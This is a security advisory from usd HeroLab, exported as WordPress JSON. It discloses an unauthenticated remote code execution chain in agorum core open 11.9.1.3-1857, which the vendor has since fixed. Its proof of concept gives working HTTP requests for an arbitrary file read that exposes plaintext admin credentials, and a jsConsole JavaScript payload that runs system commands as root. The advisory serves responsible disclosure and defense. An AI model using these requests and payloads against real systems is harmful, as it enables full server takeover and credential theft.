{"id":24286,"date":"2025-06-27T16:09:06","date_gmt":"2025-06-27T14:09:06","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0030\/"},"modified":"2025-07-01T10:31:34","modified_gmt":"2025-07-01T08:31:34","slug":"usd-2025-0030","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0030\/","title":{"rendered":"usd-2025-0030"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n<h1>usd-2025-0030 | Agorum core open 11.9.1.3-1857 - Unauthenticated Remote Code Execution Chain<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: Agorum core open<br \/><strong>Affected Version<\/strong>: 11.9.1.3-1857<br \/><strong>Vulnerability Type<\/strong>: Unauthenticated Remote Code Execution Chain<br \/><strong>Security Risk<\/strong>: Critical<br \/><strong>Vendor<\/strong>: Agorum<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.agorum.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.agorum.com\/<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>CVE Number<\/strong>: Not requested<br \/><strong>CVE Link<\/strong>: Not requested<br \/><strong>Advisory ID<\/strong>: usd-2025-0030<\/p>\n<h3>Description<\/h3>\n<p>A<!-- add a description of the application and vulnerability -->gorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.<\/p>\n<p>Our researchers discovered multiple vulnerabilities in agorum core that, when chained together, allow an unauthenticated attacker to achieve full remote code execution with root privileges. This critical flaw enables complete system compromise without prior authentication.<\/p>\n<h3>Proof of Concept<\/h3>\n<p><!-- describe how the vulnerability can be exploited, feel free to add supporting images etc. -->The exploit chain consists of three distinct vulnerabilities. The initial entry point, identified as <a href=\"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0022\/\"><strong>usd-2025-0022<\/strong><\/a>, allows unauthenticated attackers to read arbitrary files. By exploiting this flaw, an attacker can retrieve the application's configuration file identified in <a href=\"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0023\/\"><strong>usd-2025-0023<\/strong><\/a> which contains plaintext credentials for the mainadmin account. This can be achieved using the following request:<\/p>\n<p><strong>Request:<\/strong><\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">GET<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/dynawebservices\/wsfiling\/?action=getTemp&amp;tmpFile=\/opt\/agorum\/agorumcore\/doc\/agorum-core-datasheet.txt<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<\/span><\/pre>\n<\/div>\n<p><strong>Response:<\/strong><\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Powered-By<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">agorum core<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">1673<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mon, 05 May 2025 05:45:32 GMT<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Apache-Coyote\/1.1<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p>Datasheet agorum core:[...]<br \/>Access\/Protocols:  Web-Portal (secure):<br \/>             [https:\/\/172.17.0.1:443]()<br \/>  Web-Portal (unsecure):<br \/>           [http:\/\/172.17.0.1:81]()<br \/>  Networkdrive (DMS Filearea):<br \/>     \\\\\\\\172.17.0.1\\\\dms<br \/>  Networkdrive (My area):<br \/>          \\\\\\\\172.17.0.1\\\\private<br \/>  FTP Access:<br \/>                      172.17.0.1:21<br \/>  IMAP-Interface:<br \/>                  172.17.0.1:143<br \/>  SMTP-Interface:<br \/>                  172.17.0.1:2501<br \/>  Mail-Domain:<br \/>                     agorumcore.com<br \/>  SMTP-Server:<br \/>                     localhost:25<br \/>  SMTP-User:<br \/>  SMTP-Password:<br \/>Access data agorum core:<br \/>  Username (Mainadmin):<br \/>            roi<br \/>  Password (Mainadmin: roi):<br \/>       Changeme123456<br \/>  Username (Demo):<br \/>                 demo<br \/>  Password  (Demo):<br \/>                demoAccess<br \/> database (mysql):<br \/>  database-Username:<br \/>               root<br \/>  database-Password:<br \/>               Changeme123456<br \/>  database-Host:<br \/>                   localhost<br \/>  database-Port:<br \/>                   3306<br \/>[...]<\/p>\n<\/div>\n<p>At this stage, the attacker has successfully escalated privileges to the mainadmin level. As identified in <a href=\"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0021\/\"><strong>usd-2025-0021<\/strong><\/a>, users with mainadmin privileges have the ability to execute arbitrary system commands. Since the application runs with root privileges by default, this leads to full system compromise.<\/p>\n<p>Arbitrary command execution can be performed using the jsConsole function via the following request:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">POST<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/api\/rest\/parse\/jsConsole<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cookie<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">JSESSIONID=[REDACTED];<br \/><\/span><span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<br \/><\/span>js=var%20runCommand%20%3D%20function(cmd)%20%7B%0A%20%20%20%20var%20runtime%20%3D%20java.lang.Runtime.getRuntime()%3B%0A%20%20%20%20var%20process%20%3D%20runtime.exec(cmd)%3B%0A%0A%20%20%20%20var%20reader%20%3D%20new%20java.io.BufferedReader(%0A%20%20%20%20%20%20%20%20new%20java.io.InputStreamReader(process.getInputStream())%0A%20%20%20%20)%3B%0A%0A%20%20%20%20var%20line%3B%0A%20%20%20%20var%20output%20%3D%20%22%22%3B%0A%20%20%20%20while%20((line%20%3D%20reader.readLine())%20!%3D%20null)%20%7B%0A%20%20%20%20%20%20%20%20output%20%2B%3D%20line%20%2B%20%22%5Cn%22%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20reader.close()%3B%0A%20%20%20%20process.waitFor()%3B%0A%20%20%20%20return%20output%3B%0A%7D%3B%0ArunCommand(%22whoami%22)%3B%0A<\/pre>\n<\/div>\n<p>The payload for the <strong>js<\/strong> parameter to execute the <strong>whoami<\/strong> command is as follows:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">runCommand<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">function<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">cmd<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">)<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">runtime<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">java<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">lang<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Runtime<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">getRuntime<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">();<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">process<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">runtime<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">exec<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">cmd<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">);<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">reader<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"k\" style=\"background: #263238;color: #bb80b3\">new<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">java<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">io<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">BufferedReader<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">        <\/span><span class=\"k\" style=\"background: #263238;color: #bb80b3\">new<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">java<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">io<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">InputStreamReader<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">process<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">getInputStream<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">())<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">);<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">line<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">;<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"kd\" style=\"background: #263238;color: #bb80b3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">output<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">;<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"k\" style=\"background: #263238;color: #bb80b3\">while<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">((<\/span><span class=\"n\" style=\"background: #263238;color: #eff\">line<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">reader<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">readLine<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">())<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">)<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">        <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">output<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">+=<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">line<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">+<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"\\\\n\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">;<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">reader<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">close<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">();<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">process<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">.<\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">waitFor<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">();<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"k\" style=\"background: #263238;color: #bb80b3\">return<\/span><span class=\"w\" style=\"background: #263238;color: #eff\"> <\/span><span class=\"n\" style=\"background: #263238;color: #eff\">output<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">;<br \/><\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">};<br \/><\/span><span class=\"n\" style=\"background: #263238;color: #eff\">runCommand<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">(<\/span><span class=\"s\" style=\"background: #263238;color: #c3e88d\">\"whoami\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">);<\/span><\/pre>\n<\/div>\n<p>The server response will include the output of the executed command:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Powered-By<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">agorum core<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Access-Control-Allow-Credentials<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">true<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Access-Control-Allow-Origin<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">[https:\/\/localhost]()<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mon, 05 May 2025 05:55:46 GMT<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/json;charset=UTF-8<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Apache-Coyote\/1.1<br \/><\/span><span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">145<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"success\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">true<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"errorClass\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"errorCode\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"errorKey\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"message\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"result\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"root\\\\n\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"errorStack\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"errorMessage\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<br \/><\/span><span class=\"w\" style=\"background: #263238;color: #eff\">    <\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"executionTime\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">8<br \/><\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}<\/span><\/p>\n<\/div>\n<h3>Fix<\/h3>\n<p><!-- how the vendor can fix the vulnerability.--><br \/><!-- if you recommended a quick workaround to the customer (and they are fine with you including it here!) feel free to add this information as well -->To mitigate this vulnerability chain, we recommend implementing strict authentication and access controls for all sensitive endpoints, especially those exposing file access or administrative functions. Input validation should be enforced to prevent injection attacks, and administrative features like command execution should be disabled by default or restricted to non-root contexts. Additionally, sensitive data such as configuration files and credentials should never be stored in plaintext.<\/p>\n<p>&nbsp;<\/p>\n<p>Users of agorum core open can upgrade to 11.9.2 or 11.10.1.<\/p>\n<h3>References<\/h3>\n<p><!-- add references to the application and vulnerability.--><\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2025-05-05<\/strong>: First contact request via mail.<\/li>\n<li><strong>2025-05-05<\/strong>: The vendor has confirmed the delivery and has begun investigating the matter.<\/li>\n<li><strong>2025-05-07<\/strong>: The vendor has begun addressing and fixing the issue.<\/li>\n<li><strong>2025-05-15<\/strong>: The vendor has addressed and fixed the vulnerability within the cloud instances.<\/li>\n<li><strong>2025-05-30<\/strong>: The vendor released fixed versions 11.9.2 and 11.10.1.<\/li>\n<li><strong>2025-06-27<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p><!-- add the names of the persons that discovered the vulnerability. This information will be sent to the vendor and published on the HeroLab blog -->This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2025-0030 | Agorum core open 11.9.1.3-1857 - Unauthenticated Remote Code Execution Chain Product: Agorum core openAffected Version: 11.9.1.3-1857Vulnerability Type: Unauthenticated Remote Code Execution ChainSecurity Risk: CriticalVendor: AgorumVendor URL: https:\/\/www.agorum.com\/Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: Not requestedCVE Link: Not requestedAdvisory ID: usd-2025-0030 Description Agorum core is an open-source Enterprise Content Management (ECM) system developed by [&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-24286","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24286","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=24286"}],"version-history":[{"count":3,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24286\/revisions"}],"predecessor-version":[{"id":24289,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/24286\/revisions\/24289"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=24286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}